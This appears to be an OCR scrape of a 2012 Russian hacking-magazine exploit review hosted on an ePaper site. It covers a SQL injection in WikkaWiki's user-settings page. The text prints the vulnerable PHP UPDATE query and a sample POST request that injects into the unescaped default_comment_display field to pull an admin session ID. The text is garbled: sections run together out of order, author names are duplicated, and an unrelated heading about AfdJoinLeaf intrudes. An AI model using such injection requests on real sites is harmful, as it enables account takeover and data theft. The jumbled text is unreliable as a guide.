13.07.2015 Views

НА БАГАХ В CHROME - Xakep Online

НА БАГАХ В CHROME - Xakep Online

НА БАГАХ В CHROME - Xakep Online

SHOW MORE
SHOW LESS
  • No tags were found...

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

ВЗЛОМ / ОБЗОР ЭКСПЛОИТОВПавел Павел Александрович (ivinside.blogspot.com)Дмитрий Михайлович Дмитрий Михайлович (115612, дер. Красная звездочка, д.1)0бзорэксплоитовВ нашу нелегкую эпоху буйства компьютерных технологий мы с радостьюпредставляем очередной обзор нашумевших уязвимостейи сплоитов для них. Как всегда, призываем тебя использовать ихне хулиганства ради, а защиты для!1Множественные уязвимости в WikkaWikiCVSSV2 7.5(:N/AC:L/AU:N/C:P/I:P/A:P)BRIEFВ конце ноября была опубликована информация об уязвимостяхв движке WikkaWiki, найденных товарищем Egidio Romano akaEgiX. Что примечательно, на момент публикации уязвимости ещёне были закрыты: исследователь выжидал почти два месяца послеотправки отчета разработчику, но тот по каким-то причинамне торопился исправлять баги.будет ошибка). Однако всегда можно выполнить подзапрос и увестиидентификатор сессии админа. Вот пример такого запроса:POST /wikka/UserSettings HTTP/1.1Host: localhostCookie: 96522b217a86eca82f6d72ef88c4c7f4=c3u94bo2csludij3v18787i4p6Content-Length: 140Content-Type: application/x-www-form-urlencodedConnection: keep-aliveaction=update&email=test%40test.com&default_comment_display=',email=EXPLOIT1. SQL-инъекция в операторе UPDATE. Уязвимый код находитсяв файле /actions/usersettings/usersettings.php, строки 140–152:default: // input is valid$this->Query("UPDATE ".$this->GetConfigValue('table_prefix')."usersSET email = '".mysql_real_escape_string($email)."',doubleclickedit='".mysql_real_escape_string($doubleclickedit)."',show_comments='".mysql_real_escape_string($show_comments)."',default_comment_display='".$default_comment_display."',revisioncount = ".$revisioncount.",changescount = ".$changescount.",theme = '".mysql_real_escape_string($usertheme)."'WHERE name = '".$user['name']."'LIMIT 1");При выполнении запроса, содержащегося в этом коде, мы видим,что функция mysql_real_escape_string() предварительно не обрабатываетпараметр default_comment_display, а значит, мы можемвнедрить в него произвольный SQL-запрос. В некоторых случаяхнам не удастся изменить содержимое таблицы users, напримерпароль админа, по двум причинам. Во-первых, указанный запросявляется многострочным, а во-вторых, последние версии MySQLне поддерживают незакрытые комменты (коммент, открывающийсязначками /*, должен всегда оканчиваться значками */ — иначеУязвимость в функции AfdJoinLeaf052ХАКЕР 02 /157/ 2012

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!